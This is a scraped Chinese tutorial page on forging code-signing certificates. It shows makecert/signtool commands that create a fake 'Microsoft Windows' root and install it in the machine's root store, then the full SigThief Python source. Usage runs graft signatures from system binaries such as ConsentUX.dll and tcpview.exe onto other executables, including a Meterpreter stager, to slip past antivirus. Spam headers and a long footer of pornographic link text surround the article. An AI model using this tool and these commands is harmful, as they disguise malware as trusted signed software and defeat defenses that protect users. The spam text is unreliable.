婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > Python使用sigthief簽發證書的實現步驟

Python使用sigthief簽發證書的實現步驟

熱門標簽:百度地圖標注位置怎么修改 洪澤縣地圖標注 高德地圖標注是免費的嗎 無錫客服外呼系統一般多少錢 老人電話機器人 北京電信外呼系統靠譜嗎 大連crm外呼系統 梅州外呼業務系統 地圖標注視頻廣告

證書制作工具下載: https://github.com/3gstudent/signtools

制作并簽發證書:

正常情況下,針對exe簽發證書有如下幾個步驟.

1.查詢一個程序中存在的證書,可以使用下面三個命令。

c:\&; signtools Get-AuthenticodeSignature C:\Windows\System32\ConsentUX.dll
c:\&; signtools signtool.exe verify /v C:\Windows\System32\ConsentUX.dll
c:\&; signtools sigcheck.exe -q C:\Windows\System32\ConsentUX.dll

2.使用makecert命令制作證書,sv-私鑰文件名,ss-主題的證書存儲名稱,n-證書頒發對象,r-證書存儲位置。

c:\&; signtools makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cer
c:\&; signtools cert2spc Root.cer Root.spc
c:\&; signtools pvk2pfx -pvk Root.pvk -pi 1233 -spc Root.spc -pfx Root.pfx -f

3.注冊證書與簽發證書。

c:\&; signtools certmgr.exe -add -c Root.cer -s -r localmachine root
c:\&; signtools signtool sign /f Root.pfx /p 1233 lyshark.exe

而如果要給PowerShell腳本添加證書,則執行如下命令即可.

1.生成證書文件

c:\&; makecert -n "CN=Microsoft Windows" -r -eku 1.3.6.1.5.5.7.3.3 -sv certtest.pvk certtest.cer
c:\&; cert2spc certtest.cer certtest.spc
c:\&; pvk2pfx -pvk certtest.pvk -pi 123123 -spc certtest.spc -pfx certtest.pfx -f

2.給powershell腳本簽名

c:\&; powershell
c:\&; $cert = Get-PfxCertificate certtest.pfx
c:\&; Set-AuthenticodeSignature -Filepath lyshark.ps1 -Cert $cert

偽造PE文件證書:

有些反病毒軟件供應商優先考慮某些證書頒發機構而不檢查簽名是否真正有效,并且有一些只是檢查以查看certTable是否填充了某些值。這個工具讓你快速將從已簽名的PE文件中刪除簽名并將其附加到另一個文件,修復證書表以對文件進行簽名。

開源工具SigThief可用于偽造證書,將下方代碼保存為sigthief.py即可:

import sys
import struct
import shutil
import io
from optparse import OptionParser

def gather_file_info_win(binary):
        """
        Borrowed from BDF...
        I could just skip to certLOC... *shrug*
        """
        flItms = {}
        binary = open(binary, 'rb')
        binary.seek(int('3C', 16))
        flItms['buffer'] = 0
        flItms['JMPtoCodeAddress'] = 0
        flItms['dis_frm_pehdrs_sectble'] = 248
        flItms['pe_header_location'] = struct.unpack('i', binary.read(4))[0]
        # Start of COFF
        flItms['COFF_Start'] = flItms['pe_header_location'] + 4
        binary.seek(flItms['COFF_Start'])
        flItms['MachineType'] = struct.unpack('H', binary.read(2))[0]
        binary.seek(flItms['COFF_Start'] + 2, 0)
        flItms['NumberOfSections'] = struct.unpack('H', binary.read(2))[0]
        flItms['TimeDateStamp'] = struct.unpack('I', binary.read(4))[0]
        binary.seek(flItms['COFF_Start'] + 16, 0)
        flItms['SizeOfOptionalHeader'] = struct.unpack('H', binary.read(2))[0]
        flItms['Characteristics'] = struct.unpack('H', binary.read(2))[0]
        #End of COFF
        flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20

        #if flItms['SizeOfOptionalHeader']:
            #Begin Standard Fields section of Optional Header
        binary.seek(flItms['OptionalHeader_start'])
        flItms['Magic'] = struct.unpack('H', binary.read(2))[0]
        flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
        flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
        flItms['SizeOfCode'] = struct.unpack("I", binary.read(4))[0]
        flItms['SizeOfInitializedData'] = struct.unpack("I", binary.read(4))[0]
        flItms['SizeOfUninitializedData'] = struct.unpack("I",
                                                               binary.read(4))[0]
        flItms['AddressOfEntryPoint'] = struct.unpack('I', binary.read(4))[0]
        flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
        flItms['BaseOfCode'] = struct.unpack('I', binary.read(4))[0]
        if flItms['Magic'] != 0x20B:
            flItms['BaseOfData'] = struct.unpack('I', binary.read(4))[0]
        # End Standard Fields section of Optional Header
        # Begin Windows-Specific Fields of Optional Header
        if flItms['Magic'] == 0x20B:
            flItms['ImageBase'] = struct.unpack('Q', binary.read(8))[0]
        else:
            flItms['ImageBase'] = struct.unpack('I', binary.read(4))[0]
        flItms['SectionAlignment'] = struct.unpack('I', binary.read(4))[0]
        flItms['FileAlignment'] = struct.unpack('I', binary.read(4))[0]
        flItms['MajorOperatingSystemVersion'] = struct.unpack('H',
                                                                   binary.read(2))[0]
        flItms['MinorOperatingSystemVersion'] = struct.unpack('H',
                                                                   binary.read(2))[0]
        flItms['MajorImageVersion'] = struct.unpack('H', binary.read(2))[0]
        flItms['MinorImageVersion'] = struct.unpack('H', binary.read(2))[0]
        flItms['MajorSubsystemVersion'] = struct.unpack('H', binary.read(2))[0]
        flItms['MinorSubsystemVersion'] = struct.unpack('H', binary.read(2))[0]
        flItms['Win32VersionValue'] = struct.unpack('I', binary.read(4))[0]
        flItms['SizeOfImageLoc'] = binary.tell()
        flItms['SizeOfImage'] = struct.unpack('I', binary.read(4))[0]
        flItms['SizeOfHeaders'] = struct.unpack('I', binary.read(4))[0]
        flItms['CheckSum'] = struct.unpack('I', binary.read(4))[0]
        flItms['Subsystem'] = struct.unpack('H', binary.read(2))[0]
        flItms['DllCharacteristics'] = struct.unpack('H', binary.read(2))[0]
        if flItms['Magic'] == 0x20B:
            flItms['SizeOfStackReserve'] = struct.unpack('Q', binary.read(8))[0]
            flItms['SizeOfStackCommit'] = struct.unpack('Q', binary.read(8))[0]
            flItms['SizeOfHeapReserve'] = struct.unpack('Q', binary.read(8))[0]
            flItms['SizeOfHeapCommit'] = struct.unpack('Q', binary.read(8))[0]

        else:
            flItms['SizeOfStackReserve'] = struct.unpack('I', binary.read(4))[0]
            flItms['SizeOfStackCommit'] = struct.unpack('I', binary.read(4))[0]
            flItms['SizeOfHeapReserve'] = struct.unpack('I', binary.read(4))[0]
            flItms['SizeOfHeapCommit'] = struct.unpack('I', binary.read(4))[0]
        flItms['LoaderFlags'] = struct.unpack('I', binary.read(4))[0]  # zero
        flItms['NumberofRvaAndSizes'] = struct.unpack('I', binary.read(4))[0]
        # End Windows-Specific Fields of Optional Header
        # Begin Data Directories of Optional Header
        flItms['ExportTableRVA'] = struct.unpack('I', binary.read(4))[0]
        flItms['ExportTableSize'] = struct.unpack('I', binary.read(4))[0]
        flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
        #ImportTable SIZE|LOC
        flItms['ImportTableRVA'] = struct.unpack('I', binary.read(4))[0]
        flItms['ImportTableSize'] = struct.unpack('I', binary.read(4))[0]
        flItms['ResourceTable'] = struct.unpack('Q', binary.read(8))[0]
        flItms['ExceptionTable'] = struct.unpack('Q', binary.read(8))[0]
        flItms['CertTableLOC'] = binary.tell()
        flItms['CertLOC'] = struct.unpack("I", binary.read(4))[0]
        flItms['CertSize'] = struct.unpack("I", binary.read(4))[0]
        binary.close()
        return flItms


def copyCert(exe):
    flItms = gather_file_info_win(exe)

    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
        # not signed
        print("Input file Not signed!")
        sys.exit(-1)

    with open(exe, 'rb') as f:
        f.seek(flItms['CertLOC'], 0)
        cert = f.read(flItms['CertSize'])
    return cert


def writeCert(cert, exe, output):
    flItms = gather_file_info_win(exe)
    
    if not output: 
        output = output = str(exe) + "_signed"

    shutil.copy2(exe, output)
    
    print("Output file: {0}".format(output))

    with open(exe, 'rb') as g:
        with open(output, 'wb') as f:
            f.write(g.read())
            f.seek(0)
            f.seek(flItms['CertTableLOC'], 0)
            f.write(struct.pack("I", len(open(exe, 'rb').read())))
            f.write(struct.pack("I", len(cert)))
            f.seek(0, io.SEEK_END)
            f.write(cert)

    print("Signature appended. \nFIN.")

def outputCert(exe, output):
    cert = copyCert(exe)
    if not output:
        output = str(exe) + "_sig"

    print("Output file: {0}".format(output))

    open(output, 'wb').write(cert)

    print("Signature ripped. \nFIN.")


def check_sig(exe):
    flItms = gather_file_info_win(exe)
 
    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
        # not signed
        print("Inputfile Not signed!")
    else:
        print("Inputfile is signed!")


def truncate(exe, output):
    flItms = gather_file_info_win(exe)
 
    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
        # not signed
        print("Inputfile Not signed!")
        sys.exit(-1)
    else:
        print( "Inputfile is signed!")

    if not output:
        output = str(exe) + "_nosig"

    print("Output file: {0}".format(output))

    shutil.copy2(exe, output)

    with open(output, "r+b") as binary:
        print('Overwriting certificate table pointer and truncating binary')
        binary.seek(-flItms['CertSize'], io.SEEK_END)
        binary.truncate()
        binary.seek(flItms['CertTableLOC'], 0)
        binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")

    print("Signature removed. \nFIN.")


def signfile(exe, sigfile, output):
    flItms = gather_file_info_win(exe)
    
    cert = open(sigfile, 'rb').read()

    if not output: 
        output = output = str(exe) + "_signed"

    shutil.copy2(exe, output)
    
    print("Output file: {0}".format(output))
    
    with open(exe, 'rb') as g:
        with open(output, 'wb') as f:
            f.write(g.read())
            f.seek(0)
            f.seek(flItms['CertTableLOC'], 0)
            f.write(struct.pack("I", len(open(exe, 'rb').read())))
            f.write(struct.pack("I", len(cert)))
            f.seek(0, io.SEEK_END)
            f.write(cert)
    print("Signature appended. \nFIN.")


if __name__ == "__main__":
    usage = 'usage: %prog [options]'
    parser = OptionParser()
    parser.add_option("-i", "--file", dest="inputfile", 
                  help="input file", metavar="FILE")
    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
                  help='rip signature off inputfile')
    parser.add_option('-a', '--add', dest='addsig', action='store_true',
                  help='add signautre to targetfile')
    parser.add_option('-o', '--output', dest='outputfile',
                  help='output file')
    parser.add_option('-s', '--sig', dest='sigfile',
                  help='binary signature from disk')
    parser.add_option('-t', '--target', dest='targetfile',
                  help='file to append signature to')
    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
                  help='file to check if signed; does not verify signature')
    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
                  help='truncate signature (i.e. remove sig)')
    (options, args) = parser.parse_args()
    
    # rip signature
    # inputfile and rip to outputfile
    if options.inputfile and options.ripsig:
        print("Ripping signature to file!")
        outputCert(options.inputfile, options.outputfile)
        sys.exit()    

    # copy from one to another
    # inputfile and rip to targetfile to outputfile    
    if options.inputfile and options.targetfile:
        cert = copyCert(options.inputfile)
        writeCert(cert, options.targetfile, options.outputfile)
        sys.exit()

    # check signature
    # inputfile 
    if options.inputfile and options.checksig:
        check_sig(options.inputfile) 
        sys.exit()

    # add sig to target file
    if options.targetfile and options.sigfile:
        signfile(options.targetfile, options.sigfile, options.outputfile)
        sys.exit()
        
    # truncate
    if options.inputfile and options.truncate:
        truncate(options.inputfile, options.outputfile)
        sys.exit()

    parser.print_help()
    parser.error("You must do something!")

我們需要找一個帶有證書的文件,然后通過使用sigthief.py完成證書的克隆。此處就拿系統中的ConsentUX.dll演示。

c:\&; python sigthief.py -i ConsentUX.dll -t lyshark.exe -o check.exe
Output file: check.exe
Signature appended.
FIN.

也可以從二進制文件中獲取簽名并將其添加到另一個二進制文件中

$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
Output file: /tmp/msftesting_tcpview.exe
Signature appended. 
FIN.

將簽名保存到磁盤以供以后使用,提供了一個轉存功能。

$ ./sigthief.py -i tcpview.exe -r                                                        
Ripping signature to file!
Output file: tcpview.exe_sig
Signature ripped. 
FIN.
```BASH
使用翻錄簽名
```BASH
$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
Output file: x86_meterpreter_stager.exe_signed
Signature appended. 
FIN.
```BASH
截斷(刪除)簽名 這實際上有非常有趣的結果,可以幫助您找到重視代碼功能簽名的AV)
```BASH
$ ./sigthief.py -i tcpview.exe -T    
Inputfile is signed!
Output file: tcpview.exe_nosig
Overwriting certificate table pointer and truncating binary
Signature removed. 
FIN.

文章出處:https://www.cnblogs.com/lyshark

以上就是Python使用sigthief簽發證書的實現步驟的詳細內容,更多關于Python使用sigthief簽發證書的資料請關注腳本之家其它相關文章!

您可能感興趣的文章:
  • 基于python檢查SSL證書到期情況代碼實例
  • Python SSL證書驗證問題解決方案
  • python requests證書問題解決
  • python有證書的加密解密實現方法
  • python實現無證書加密解密實例

標簽:岳陽 怒江 長春 清遠 吉林 安慶 洛陽 泉州

巨人網絡通訊聲明:本文標題《Python使用sigthief簽發證書的實現步驟》,本文關鍵詞  Python,使用,sigthief,簽發,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Python使用sigthief簽發證書的實現步驟》相關的同類信息!
  • 本頁收集關于Python使用sigthief簽發證書的實現步驟的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    丝袜亚洲精品中文字幕一区| 久久夜色精品国产欧美乱极品| 精品一区二区三区的国产在线播放 | 亚洲自拍欧美精品| 国产精品成人免费在线| 中文字幕中文在线不卡住| 丝袜美腿亚洲综合| 亚洲国产日韩a在线播放性色| 亚洲午夜久久久久| 日韩有码一区二区三区| 蓝色福利精品导航| 国产乱码精品1区2区3区| 国产电影一区二区三区| 成人精品鲁一区一区二区| 99免费精品视频| 欧美视频自拍偷拍| 日韩一区二区电影| 国产日韩一级二级三级| 亚洲免费av在线| 日本不卡一区二区三区| 狠狠色综合色综合网络| 岛国av在线一区| 欧美主播一区二区三区美女| 日韩视频123| 国产三级精品视频| 亚洲国产精品久久人人爱| 久久爱另类一区二区小说| 国产成a人亚洲精品| 欧美色国产精品| 精品99久久久久久| 亚洲日本一区二区| 久久9热精品视频| 色一情一乱一乱一91av| 欧美一区二区三区系列电影| 久久久综合网站| 亚洲第一成年网| 成人免费黄色大片| 欧美一级在线免费| 亚洲精品日韩一| 国产麻豆成人传媒免费观看| 色狠狠一区二区| 亚洲国产高清不卡| 美女高潮久久久| 色婷婷综合久久久久中文| 久久综合久色欧美综合狠狠| 亚洲国产精品自拍| 色综合咪咪久久| 欧美国产日韩精品免费观看| 五月综合激情婷婷六月色窝| 成人黄色免费短视频| 精品国产区一区| 日韩电影在线免费| 欧美天堂一区二区三区| 中文字幕一区二区三区精华液 | 亚洲欧美另类图片小说| 国内成人自拍视频| 欧美一级欧美三级在线观看 | 久久精品免费在线观看| 午夜伦欧美伦电影理论片| 91丨porny丨户外露出| 国产午夜精品久久久久久久| 麻豆国产欧美日韩综合精品二区 | 制服丝袜亚洲色图| 亚洲一区二区视频在线| 色一情一伦一子一伦一区| 国产精品理论在线观看| 国产a视频精品免费观看| 26uuu亚洲| 国产精品一二三四区| 26uuu精品一区二区三区四区在线| 蜜桃av一区二区| 精品日韩欧美在线| 国产中文字幕一区| 国产午夜精品久久久久久久| 国产不卡视频在线播放| 欧美国产丝袜视频| 色综合久久久久综合99| 一区二区三区91| 欧美高清hd18日本| 久久99精品一区二区三区| 久久亚洲一级片| 粉嫩绯色av一区二区在线观看| 久久久欧美精品sm网站| www.亚洲精品| 亚洲一区二区精品久久av| 欧美剧情电影在线观看完整版免费励志电影| 亚洲一级二级在线| 日韩欧美另类在线| 高清不卡一区二区在线| 国产精品国产三级国产aⅴ入口| 色综合久久久久久久| 日本女人一区二区三区| 精品久久人人做人人爱| 波多野结衣在线aⅴ中文字幕不卡| 亚洲自拍偷拍欧美| 日韩欧美成人激情| 丁香天五香天堂综合| 一卡二卡三卡日韩欧美| 欧美一区二区成人| 99久久精品一区| 免费观看一级特黄欧美大片| 欧美国产1区2区| 欧美日韩美少妇| 成人免费高清视频| 免费三级欧美电影| 亚洲三级小视频| 精品国产麻豆免费人成网站| 99久久精品国产麻豆演员表| 日韩vs国产vs欧美| 国产精品美女久久久久aⅴ国产馆| 欧美中文字幕一区二区三区| 国产精品自拍毛片| 午夜精品久久久| 日韩一区在线播放| 亚洲精品一区二区三区香蕉| 欧美亚州韩日在线看免费版国语版| 精品中文字幕一区二区小辣椒| 亚洲视频免费在线| 久久精品亚洲乱码伦伦中文| 欧美美女喷水视频| 色婷婷综合久久久久中文| 国产精品66部| 国产真实乱对白精彩久久| 亚洲国产日韩精品| 亚洲人成电影网站色mp4| 国产亚洲女人久久久久毛片| 91精品国产入口| 欧美色视频一区| 日本福利一区二区| 97久久超碰国产精品| 国产成人免费网站| 国产伦精一区二区三区| 卡一卡二国产精品 | 欧美一卡二卡三卡四卡| 欧美中文一区二区三区| 99国产精品一区| 成人精品鲁一区一区二区| 国精产品一区一区三区mba视频| 日韩中文字幕av电影| 亚洲午夜久久久| 亚洲一卡二卡三卡四卡五卡| 亚洲中国最大av网站| 亚洲日韩欧美一区二区在线| 国产精品无人区| 国产三级一区二区| 欧美国产激情一区二区三区蜜月| 久久久久久久性| 欧美国产一区在线| 国产精品美女久久久久av爽李琼 | 日韩av电影天堂| 蜜臀av性久久久久蜜臀aⅴ流畅| 日韩国产精品久久久久久亚洲| 日韩影院在线观看| 日韩va亚洲va欧美va久久| 欧美bbbbb| 国内成人精品2018免费看| 国产福利视频一区二区三区| 国产精品123| 色系网站成人免费| 欧美色图天堂网| 日韩精品一区二区三区三区免费| 2019国产精品| 最新国产精品久久精品| 亚洲裸体在线观看| 日韩av不卡在线观看| 黄网站免费久久| 97久久精品人人做人人爽50路| 色av成人天堂桃色av| 欧美日韩免费在线视频| 精品久久久久av影院| 国产精品剧情在线亚洲| 亚洲国产日韩av| 国产精品一区二区久久精品爱涩 | 中文字幕在线免费不卡| 亚洲国产精品麻豆| 国产风韵犹存在线视精品| 在线观看视频一区二区欧美日韩| 制服丝袜在线91| 亚洲欧洲99久久| 日本不卡视频一二三区| 成人激情动漫在线观看| 欧美色国产精品| 中文字幕免费一区| 奇米一区二区三区| 94-欧美-setu| 欧美成va人片在线观看| 亚洲欧美激情在线| 国产一区二区女| 91精品国产乱| 亚洲女人****多毛耸耸8| 黄页网站大全一区二区| 欧美日韩一区视频| 国产精品乱子久久久久| 免费精品视频在线| 欧美午夜一区二区三区| 中文字幕免费一区| 韩国欧美一区二区| 91精品国产综合久久蜜臀| 一区二区三区国产精华| 成人黄色免费短视频|